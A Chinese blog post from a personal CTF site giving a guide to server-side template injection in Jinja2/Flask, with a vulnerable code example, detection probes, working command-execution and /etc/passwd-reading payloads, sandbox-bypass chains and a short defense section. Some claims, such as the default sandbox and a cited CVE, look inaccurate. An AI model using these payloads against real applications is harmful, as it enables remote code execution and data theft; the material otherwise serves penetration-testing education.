<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>SSTI-python模板引擎Jinja2注入全面指南 | isum</title>
  <meta name="keywords" content=" ssti ">
  <meta name="description" content="SSTI-python模板引擎Jinja2注入全面指南 | isum">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta property="og:type" content="website">
<meta property="og:title" content="关于页">
<meta property="og:url" content="https://ehzisum.github.io/about/index.html">
<meta property="og:site_name" content="isum">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2024-04-26T23:27:22.000Z">
<meta property="article:modified_time" content="2024-11-29T07:11:30.823Z">
<meta property="article:author" content="isum">
<meta name="twitter:card" content="summary">


<link rel="icon" href="/img/avater.jpg">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/atom-light.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="//cdn.jsdelivr.net/npm/jquery.cookie@1.4.1/jquery.cookie.min.js" ></script>

<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 6.3.0"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
  <input id="theme_highlight_on" value="true" />
  <input id="theme_code_copy" value="true" />
</div>



<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/"
   class="avatar_target">
    <img class="avatar"
         src="/img/avater.jpg"/>
</a>
<div class="author">
    <span>isum</span>
</div>

<div class="icon">
    
        
    
        
    
        
    
</div>





<ul>
    <li>
        <div class="all active" data-rel="全部文章">全部文章
            
                <small>(5)</small>
            
        </div>
    </li>
    
        
            
                
    <li>
        <div data-rel="ctf">
            
            ctf
            <small>(4)</small>
        </div>
        
    </li>

            
        
    
        
            
                
    <li>
        <div data-rel="other">
            
            other
            <small>(1)</small>
        </div>
        
    </li>

            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
        
            
            
            
    </div>
    <div>
        
            <a class="about  site_url"
               
               href="/about">关于</a>
        
        
    </div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="5">

<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="https://kaikaix.github.io/">kaikaix</a></li>
            
            <li><a target="_blank" href="https://nicolee278.github.io/">nicolee278</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="搜索 快捷键 i"></i>
            <div class="right-title">全部文章</div>
            <i class="iconfont icon-file-tree" data-title="切换到大纲视图 快捷键 w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="返回"></i>
            <input id="local-search-input" autocomplete="off"/>
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="大小写敏感"></i>
            <i class="iconfont icon-tag" data-title="标签"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">大纲</div>
            <i class="iconfont icon-list" data-title="切换到文章列表"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>hexo</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>ssti</a>
            </li>
        
    </div>

</div>

    
    <nav id="title-list-nav">
        
        
        <a  class="全部文章 ctf "
           href="/2025/03/24/SSTI-php%E6%A8%A1%E6%9D%BF%E5%BC%95%E6%93%8ESmarty%E6%B3%A8%E5%85%A5%E5%85%A8%E9%9D%A2%E6%8C%87%E5%8D%97/"
           data-tag="ssti"
           data-author="" >
            <span class="post-title" title="SSTI-php模板引擎Smarty注入全面指南">SSTI-php模板引擎Smarty注入全面指南</span>
            <span class="post-date" title="2025-03-24 09:12:27">2025/03/24</span>
        </a>
        
        
        <a  class="全部文章 ctf "
           href="/2025/03/24/SSTI-Java%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E5%85%A8%E9%9D%A2%E6%8C%87%E5%8D%97/"
           data-tag="ssti"
           data-author="" >
            <span class="post-title" title="SSTI-Java模板注入全面指南">SSTI-Java模板注入全面指南</span>
            <span class="post-date" title="2025-03-24 09:03:16">2025/03/24</span>
        </a>
        
        
        <a  class="全部文章 ctf "
           href="/2025/03/24/SSTI-python%E6%A8%A1%E6%9D%BF%E5%BC%95%E6%93%8EJinja2%E6%B3%A8%E5%85%A5%E5%85%A8%E9%9D%A2%E6%8C%87%E5%8D%97/"
           data-tag="ssti"
           data-author="" >
            <span class="post-title" title="SSTI-python模板引擎Jinja2注入全面指南">SSTI-python模板引擎Jinja2注入全面指南</span>
            <span class="post-date" title="2025-03-24 09:02:31">2025/03/24</span>
        </a>
        
        
        <a  class="全部文章 ctf "
           href="/2025/03/24/SSTI-php%E6%A8%A1%E6%9D%BF%E5%BC%95%E6%93%8ETwig%E6%B3%A8%E5%85%A5%E5%85%A8%E9%9D%A2%E6%8C%87%E5%8D%97/"
           data-tag="ssti"
           data-author="" >
            <span class="post-title" title="SSTI-php模板引擎Twig注入全面指南">SSTI-php模板引擎Twig注入全面指南</span>
            <span class="post-date" title="2025-03-24 09:01:02">2025/03/24</span>
        </a>
        
        
        <a  class="全部文章 other "
           href="/2024/04/26/hello-world/"
           data-tag="hexo"
           data-author="" >
            <span class="post-title" title="Hello World">Hello World</span>
            <span class="post-date" title="2024-04-26 11:03:00">2024/04/26</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>

    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="切换全屏 快捷键 s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-SSTI-python模板引擎Jinja2注入全面指南" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">SSTI-python模板引擎Jinja2注入全面指南</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            <i class="iconfont icon-category"></i>
            
            
            <a  data-rel="ctf">ctf</a>
            
        </span>
        
        
        <span class="tag">
            <i class="iconfont icon-tag"></i>
            
            <a class="color5">ssti</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
            发布时间 : <time class="date" title='最后更新: 2025-03-24 09:02:50'>2025-03-24 09:02</time>
        
    </div>
    <div class="article-meta">
        
        
        <span id="busuanzi_container_page_pv">
            阅读 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
        <span class="top-comment" title="跳转至评论区">
            <a href="#comments">
                评论:<span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </a>
        </span>
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E3%80%81%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86"><span class="toc-text">一、基础知识</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-Jinja2%E7%AE%80%E4%BB%8B"><span class="toc-text">1. Jinja2简介</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E5%BC%80%E5%8F%91%E4%B8%AD%E7%9A%84%E4%BB%A3%E7%A0%81%E5%AE%9E%E4%BE%8B"><span class="toc-text">2. 开发中的代码实例</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%AD%A3%E5%B8%B8%E4%BD%BF%E7%94%A8%E7%A4%BA%E4%BE%8B%EF%BC%88%E5%AE%89%E5%85%A8%EF%BC%89"><span class="toc-text">正常使用示例（安全）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9C%89%E6%BC%8F%E6%B4%9E%E7%9A%84%E4%BB%A3%E7%A0%81%E7%A4%BA%E4%BE%8B%EF%BC%88%E5%8D%B1%E9%99%A9%EF%BC%81%EF%BC%89"><span class="toc-text">有漏洞的代码示例（危险！）</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E3%80%81%E6%B8%97%E9%80%8F%E5%85%B3%E9%94%AE%E7%82%B9"><span class="toc-text">二、渗透关键点</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E6%A3%80%E6%B5%8B%E6%B3%A8%E5%85%A5%E7%82%B9"><span class="toc-text">1. 检测注入点</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E6%B2%99%E7%9B%92%E7%8A%B6%E6%80%81%E5%88%A4%E6%96%AD"><span class="toc-text">2. 沙盒状态判断</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89%E3%80%81%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E4%B8%8EPayload"><span class="toc-text">三、漏洞利用与Payload</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E5%9F%BA%E7%A1%80%E5%88%A9%E7%94%A8%EF%BC%88Python%E5%AF%B9%E8%B1%A1%E6%93%8D%E4%BD%9C%EF%BC%89"><span class="toc-text">1. 基础利用（Python对象操作）</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="toc-text">执行命令</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96"><span class="toc-text">文件读取</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E7%B1%BB%E7%BB%A7%E6%89%BF%E9%93%BE%E6%94%BB%E5%87%BB"><span class="toc-text">2. 类继承链攻击</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%80%9A%E8%BF%87-mro-%E8%AE%BF%E9%97%AE%E5%8D%B1%E9%99%A9%E7%B1%BB"><span class="toc-text">通过__mro__访问危险类</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E7%BB%95%E8%BF%87%E6%B2%99%E7%9B%92%E7%9A%84%E5%BF%AB%E6%8D%B7%E6%96%B9%E5%BC%8F"><span class="toc-text">3. 绕过沙盒的快捷方式</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8-dict-%E8%AE%BF%E9%97%AE%E6%A8%A1%E5%9D%97"><span class="toc-text">使用__dict__访问模块</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E5%86%85%E7%BD%AEcycler%E6%88%96joiner%EF%BC%88Flask%E7%89%B9%E5%AE%9A%EF%BC%89"><span class="toc-text">利用内置cycler或joiner（Flask特定）</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-%E5%85%B6%E4%BB%96Payload"><span class="toc-text">4. 其他Payload</span></a></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h2 id="一、基础知识"><a href="#一、基础知识" class="headerlink" title="一、基础知识"></a>一、基础知识</h2><h3 id="1-Jinja2简介"><a href="#1-Jinja2简介" class="headerlink" title="1. Jinja2简介"></a>1. Jinja2简介</h3><p>• <strong>模板引擎</strong>：Python的主流模板引擎，广泛用于Flask、Django等框架。<br>• <strong>语法标签</strong>：<br>  • 变量输出：<code>&#123;&#123; variable &#125;&#125;</code><br>  • 逻辑控制：<code>&#123;% if condition %&#125;...&#123;% endif %&#125;</code><br>  • 注释：&#96;&#96;<br>• <strong>沙盒机制</strong>：默认禁用危险操作（如文件读写），但可通过继承链绕过。</p>
<hr>
<h3 id="2-开发中的代码实例"><a href="#2-开发中的代码实例" class="headerlink" title="2. 开发中的代码实例"></a>2. 开发中的代码实例</h3><h4 id="正常使用示例（安全）"><a href="#正常使用示例（安全）" class="headerlink" title="正常使用示例（安全）"></a>正常使用示例（安全）</h4><pre><code class="python">from jinja2 import Environment, FileSystemLoader

env = Environment(loader=FileSystemLoader(&#39;templates&#39;))
template = env.get_template(&#39;index.html&#39;)
name = request.args.get(&#39;name&#39;, &#39;Guest&#39;)
output = template.render(name=name)  # 安全渲染
</code></pre>
<h4 id="有漏洞的代码示例（危险！）"><a href="#有漏洞的代码示例（危险！）" class="headerlink" title="有漏洞的代码示例（危险！）"></a>有漏洞的代码示例（危险！）</h4><pre><code class="python">from jinja2 import Template

user_input = request.args.get(&#39;content&#39;)
template = Template(user_input)  # 直接渲染用户输入
output = template.render()
</code></pre>
<hr>
<h2 id="二、渗透关键点"><a href="#二、渗透关键点" class="headerlink" title="二、渗透关键点"></a>二、渗透关键点</h2><h3 id="1-检测注入点"><a href="#1-检测注入点" class="headerlink" title="1. 检测注入点"></a>1. 检测注入点</h3><p>• <strong>输入点</strong>：URL参数、Cookie、动态模板内容。<br>• <strong>检测方法</strong>：</p>
<pre><code class="http">GET /page?param=&#123;&#123;7 * 7&#125;&#125; HTTP/1.1
</code></pre>
<h3 id="2-沙盒状态判断"><a href="#2-沙盒状态判断" class="headerlink" title="2. 沙盒状态判断"></a>2. 沙盒状态判断</h3><p>• <strong>默认沙盒</strong>：Jinja2默认限制文件读写和危险函数。<br>• <strong>沙盒绕过标志</strong>：尝试访问敏感属性（如<code>__class__</code>），成功则沙盒未启用。</p>
<hr>
<h2 id="三、漏洞利用与Payload"><a href="#三、漏洞利用与Payload" class="headerlink" title="三、漏洞利用与Payload"></a>三、漏洞利用与Payload</h2><h3 id="1-基础利用（Python对象操作）"><a href="#1-基础利用（Python对象操作）" class="headerlink" title="1. 基础利用（Python对象操作）"></a>1. 基础利用（Python对象操作）</h3><h4 id="执行命令"><a href="#执行命令" class="headerlink" title="执行命令"></a>执行命令</h4><pre><code class="jinja2">&#123;&#123; self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() &#125;&#125;
</code></pre>
<h4 id="文件读取"><a href="#文件读取" class="headerlink" title="文件读取"></a>文件读取</h4><pre><code class="jinja2">&#123;&#123; self.__init__.__globals__.__builtins__.open('/etc/passwd').read() &#125;&#125;
</code></pre>
<h3 id="2-类继承链攻击"><a href="#2-类继承链攻击" class="headerlink" title="2. 类继承链攻击"></a>2. 类继承链攻击</h3><h4 id="通过-mro-访问危险类"><a href="#通过-mro-访问危险类" class="headerlink" title="通过__mro__访问危险类"></a>通过<code>__mro__</code>访问危险类</h4><pre><code class="jinja2">&#123;&#123; ''.__class__.__mro__[1].__subclasses__() &#125;&#125;  &lt;!-- 列出所有子类 --&gt;
</code></pre>
<p>查找可用的危险类（如<code>subprocess.Popen</code>）：</p>
<pre><code class="jinja2">&#123;&#123; ''.__class__.__mro__[1].__subclasses__()[413]('id', shell=True, stdout=-1).communicate() &#125;&#125;
</code></pre>
<h3 id="3-绕过沙盒的快捷方式"><a href="#3-绕过沙盒的快捷方式" class="headerlink" title="3. 绕过沙盒的快捷方式"></a>3. 绕过沙盒的快捷方式</h3><h4 id="使用-dict-访问模块"><a href="#使用-dict-访问模块" class="headerlink" title="使用__dict__访问模块"></a>使用<code>__dict__</code>访问模块</h4><pre><code class="jinja2">&#123;&#123; config.__class__.__init__.__globals__['os'].popen('id').read() &#125;&#125;
</code></pre>
<h4 id="利用内置cycler或joiner（Flask特定）"><a href="#利用内置cycler或joiner（Flask特定）" class="headerlink" title="利用内置cycler或joiner（Flask特定）"></a>利用内置<code>cycler</code>或<code>joiner</code>（Flask特定）</h4><pre><code class="jinja2">&#123;&#123; cycler.__init__.__globals__.os.system('id') &#125;&#125;
</code></pre>
<h3 id="4-其他Payload"><a href="#4-其他Payload" class="headerlink" title="4. 其他Payload"></a>4. 其他Payload</h3><p>• <strong>信息泄露</strong>：</p>
<pre><code class="jinja2">&#123;&#123; config &#125;&#125;                   &lt;!-- 泄露Flask配置 --&gt;
&#123;&#123; request.environ &#125;&#125;          &lt;!-- 泄露环境变量 --&gt;
</code></pre>
<p>• <strong>XSS利用</strong>：</p>
<pre><code class="jinja2">&#123;&#123; '<script>alert(1)</script>' | safe &#125;&#125;  &lt;!-- 需关闭自动转义 --&gt;
</code></pre>
<hr>
<h2 id="四、防御手段"><a href="#四、防御手段" class="headerlink" title="四、防御手段"></a>四、防御手段</h2><h3 id="1-官方推荐"><a href="#1-官方推荐" class="headerlink" title="1. 官方推荐"></a>1. 官方推荐</h3><p>• <strong>避免渲染用户输入</strong>：禁止动态拼接模板内容。<br>• <strong>启用严格沙盒</strong>：</p>
<pre><code class="python">from jinja2.sandbox import SandboxedEnvironment
env = SandboxedEnvironment()
</code></pre>
<h3 id="2-安全配置"><a href="#2-安全配置" class="headerlink" title="2. 安全配置"></a>2. 安全配置</h3><p>• 更新至最新版本（≥Jinja2 3.x）。<br>• 使用白名单限制模板可访问的属性和方法。<br>• 在Flask中禁用调试模式（<code>app.debug = False</code>）。</p>
<hr>
<h2 id="五、绕过技巧"><a href="#五、绕过技巧" class="headerlink" title="五、绕过技巧"></a>五、绕过技巧</h2><h3 id="1-字符串拼接"><a href="#1-字符串拼接" class="headerlink" title="1. 字符串拼接"></a>1. 字符串拼接</h3><pre><code class="jinja2">&#123;&#123; self["__init__"]["__globals__"]["__builtins__"]["__import__"]("os").popen("id").read() &#125;&#125;
</code></pre>
<h3 id="2-利用过滤器"><a href="#2-利用过滤器" class="headerlink" title="2. 利用过滤器"></a>2. 利用过滤器</h3><pre><code class="jinja2">&#123;&#123; "id" | map("system") &#125;&#125;
</code></pre>
<h3 id="3-全局函数注入"><a href="#3-全局函数注入" class="headerlink" title="3. 全局函数注入"></a>3. 全局函数注入</h3><pre><code class="jinja2">&#123;&#123; lipsum.__globals__.os.popen("id").read() &#125;&#125;
</code></pre>
<h3 id="4-属性链展开"><a href="#4-属性链展开" class="headerlink" title="4. 属性链展开"></a>4. 属性链展开</h3><pre><code class="jinja2">&#123;&#123; (()|select|string|list).__class__.__mro__[1].__subclasses__()[413]('id',shell=True) &#125;&#125;
</code></pre>
<hr>
<h2 id="六、总结与参考"><a href="#六、总结与参考" class="headerlink" title="六、总结与参考"></a>六、总结与参考</h2><h3 id="1-测试流程"><a href="#1-测试流程" class="headerlink" title="1. 测试流程"></a>1. 测试流程</h3><ol>
<li>检测注入点 → 2. 访问<code>__class__</code>验证沙盒 → 3. 构造继承链 → 4. 执行命令&#x2F;读取文件</li>
</ol>
<h3 id="2-高危CVE"><a href="#2-高危CVE" class="headerlink" title="2. 高危CVE"></a>2. 高危CVE</h3><p>• <strong>CVE-2019-8341</strong>：Jinja2沙盒绕过漏洞（影响版本&lt;2.10.1）。<br>• <strong>CVE-2022-2333</strong>：Flask调试模式RCE（需结合Jinja2）。</p>
<h3 id="3-参考资源"><a href="#3-参考资源" class="headerlink" title="3. 参考资源"></a>3. 参考资源</h3><p>• <a target="_blank" rel="noopener" href="https://jinja.palletsprojects.com/">Jinja2官方文档</a><br>• <a target="_blank" rel="noopener" href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md">SSTI Payload生成工具</a><br>• <a target="_blank" rel="noopener" href="https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/">Jinja2沙盒绕过研究</a></p>
<hr>
<p><strong>备注</strong>：Jinja2的沙盒限制较为严格，但通过对象继承链仍可实现绕过。渗透测试时需优先验证<code>__class__</code>等魔术方法的可访问性，并关注目标框架（如Flask）的特定漏洞。</p>

      
       <hr><span style="font-style: italic;color: gray;"> 梦里小镇落雨，开花，起风，挂霜，甚至扬起烤红薯的香气，每个墙角都能听见人们的说笑声。 </span>
    </div>
</article>





    <div id="comments"></div>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">

<script type="text/javascript">
    $.getScript('/js/gitalk.js', function () {
        var gitalk = new Gitalk({
            clientID: '3730732a738faf14fdef',
            clientSecret: '4b7d5f3ee2f01c82c5a658dab63ca47202db57d9',
            repo: 'issues',
            owner: 'ehzisum',
            admin: ['ehzisum'],
            id: decodeURI(location.pathname),
            distractionFreeMode: 'true',
            language: 'zh-CN',
            perPage: parseInt('10',10)
        })
        gitalk.render('comments')
    })
</script>




    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    落雨，开花，起风，挂霜
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="切换全屏 快捷键 s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        

        /*高亮代码块行号*/
        
        $('pre code').each(function(){
            var lines = $(this).text().trim().split('\n').length, widther='';
            if (lines>99) {
                widther = 'widther'
            }
            var $numbering = $('<ul/>').addClass('pre-numbering ' + widther).attr("unselectable","on");
            $(this).addClass('has-numbering ' + widther)
                    .parent()
                    .append($numbering);
            for(var i=1;i<=lines;i++){
                $numbering.append($('<li/>').text(i));
            }
        });
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    

</script>

<!--加入行号的高亮代码块样式-->

<style>
    pre{
        position: relative;
        margin-bottom: 24px;
        border-radius: 10px;
        border: 1px solid #e2dede;
        background: #FFF;
        overflow: hidden;
    }
    code.has-numbering{
        margin-left: 30px;
    }
    code.has-numbering.widther{
        margin-left: 35px;
    }
    .pre-numbering{
        margin: 0;
        position: absolute;
        top: 0;
        left: 0;
        width: 20px;
        padding: 18px 3px 15px 5px;
        border-right: 1px solid #C3CCD0;
        text-align: right;
        color: #AAA;
        background-color: #fafafa;
    }
    .pre-numbering.widther {
        width: 35px;
    }
</style>

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    

    
</style>







</html>
